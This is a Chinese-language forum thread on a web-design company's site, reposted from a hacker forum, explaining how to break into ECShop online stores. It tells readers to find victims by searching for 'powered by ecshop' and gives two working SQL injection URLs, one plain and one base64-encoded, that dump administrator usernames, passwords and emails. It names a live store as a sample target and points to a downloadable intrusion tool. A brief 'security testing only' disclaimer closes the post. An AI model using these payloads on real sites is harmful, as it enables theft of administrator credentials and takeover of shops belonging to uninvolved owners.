用户名称: 用户密码:
网站建设快速入口 | 宏蓝主页 | 加入收藏

广州网站建设|网站制作公司|网页设计论坛--广州宏蓝科技公司官方论坛网站建设专栏网站建设技术应用ecshop漏洞|入侵ecshop|ecshop漏洞检测
    
 
ecshop漏洞|入侵ecshop|ecshop漏洞检测
发起人:macroblue  回复数:2  浏览数:8133  最后更新:2012/9/20 14:01:10 by momo
分享到: 微信 更多

选择查看  帖子排序:
macroblue 发表于 2011/1/12 19:18:47
ecshop漏洞|入侵ecshop|ecshop漏洞检测

ECShop是Comsenz公司推出的一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。目前最新版本为2.6.0。

而这个漏洞呢,暂时是可以说是通杀ecshop的。
如果你没有目标网站,可以google上搜索:powered by ecshop
就可以找到一大堆ecshop的网站


这个时候在其网址后输入病毒代码即可以爆出该站的管理员账户密码

普通代码:"user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*"

而有些网站会针对这个问题作出些修复等等,所以这个普通代码的成功率现在已经不是那么高了.如果普通代码不行,不着急,还有个变种代码

变种代码:"search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319"

之后就可以爆出该网的账户密码

直接打开ecshop入侵工具

如果有目标网站就在地址栏上输入目标网站。
如果无目标,就直接点击最上面的搜索ecshop目标站点

随便拿一个网站来试下 <a target=_blank href="javascript:extendurl('http://shop.magickey0711.com/')" target=_self>http://shop.magickey0711.com/

在地址栏中输入该网址,点击普通代码,发现无效。很正常,我上面已经说过了
没关系,还有变种代码

这样,这个站就算是到手了。

当然仅是作为网站安全检测
不得用于非法用途。
希望大家记住我们目标与精神.

谢谢感谢大家的观看。

[tc]

本文来源:http://bbs.honker.net/viewthread.php?tid=23948&highlight=ecshop

检测工具下载:tc制作.rar

郑重声明:本文转载,工具为第三方开发并用于检测并修复漏洞之用途,任何非法用途之责任与宏蓝科技无关。

momo 发表于 2012/6/20 16:18:32
<div class=ForumPostTitle>ecshop漏洞|入侵ecshop|ecshop漏洞检测</div>
momo 发表于 2012/9/20 14:01:10
<div class=ForumPostTitle>ecshop漏洞|入侵ecshop|ecshop漏洞检测   </div>

客服热线:020-85562980 客服邮箱:service@macroblue.net
联系地址:广州中山大道89号国家软件产业基地天河软件园华景园区12-S05
版权所有 © 2003-2011    网站建设宏蓝科技Macroblue.NET